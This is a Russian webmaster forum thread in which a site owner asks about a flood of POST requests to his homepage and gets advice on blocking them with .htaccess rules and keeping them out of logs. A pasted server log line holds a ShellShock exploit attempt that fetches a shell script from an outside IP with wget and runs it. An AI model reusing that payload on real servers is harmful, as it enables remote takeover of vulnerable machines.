- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Уже почти сутки на главную страницу льется куча POST запросов типа:
В секунду порядка 10-20 с разных IP, Юзер-агентов.
Реферер везде стоит главная страница этого же сайта.
Значения у параметров всегда разные.
Как бы отфильтровал их все через htaccess, всем отдается 403. Но логи растут из-за этого...
На ddos вроде не похоже - даже когда не отфильтровал их - сервер нормально их переваливал, т.к. на главной нет никаких обработчиков post запросов.
Может кто сталкивался с таким? Что это вообще?
Можно вообще как-то недопускать POST запросы на главную, чтобы и в логах это все не фиксировалось?
Как отфильтровали?
С осени такое дело, у меня по большей части на внутряк. Если стоит метрика, то ждите в вебмастере огромное количество загруженных страниц, так как метрика их напрямую получает, если не стоит галочка "Запрет отправки страниц на индексацию", хоть это и не важно, если отфильтровали.
Это не ддос, смысл непонятен, но есть мнение, что это сделано для того, что бы опустить страницу в выдаче, поскольку бот видит кучу одинаковых страниц с одним контентом и делает нехорошие выводы.
Как отфильтровали?
RewriteCond %{REQUEST_METHOD} POST
RewriteRule ^index.php$ - [L,F]
А если запросы POST а не GET - разве такие страницы появятся? По факту url же не меняется никак...
Сколько POST запросов делается с одного IP?
Поставьте ротацию логов почаще, что бы файлы логов сильно большие не были.
А если запросы POST а не GET - разве такие страницы появятся? По факту url же не меняется никак...
Честно, сейчас даже не вспомню, какие у меня запросы были, может даже get. Я фильтровал другим путем, он подходит только для вп, думаю.
Сколько POST запросов делается с одного IP?
Максимально с одинакового IP было 135. Иногда идут с одного сразу 3-5-10 раз подряд.
Посчитал и выделил пул в ~230 IP, с которых запросы были больше всего раз. Но очень много, с которых всего по одному-два раза был запрос.
---------- Добавлено 20.12.2014 в 21:41 ----------
Просто боюсь, может ломанули, превратили в бот и теперь шлют "команды", т.к. заметил в логах ошибок такую запись:
1.9.153.65 - - [20/Dec/2014:04:08:38 +0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 361 "-" "() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1"
Полез смотреть, ShellShock конечно же не исправлен был, bash старый. Но на сервере нет ни perl, ни FastCGI - вроде не должно было сработать (как мне сказали)... А так не уверен.
---------- Добавлено 20.12.2014 в 21:45 ----------
Содержание того файла, который пытались загрузить через уязвимость bash, приведено тут - http://jrnerqbbzrq.blogspot.ru/2014/12/a-little-shellshock-fun.html
Не знаю что он делает, не спец :)
Можно вообще как-то недопускать POST запросы на главную, чтобы и в логах это все не фиксировалось?
SetEnvIf ...
CustomLog ... env=!...
Спасибо.
Догадка насчет взлома не подтвердилась. Подобные запросы в логах уже как месяц (нацеленные на уязвимость bash). А непонятные POST запросы только второй день...
Все же непонятна цель этих запросов... Генерация входящего трафика только, даже вред не наносит никакой на первый взгляд.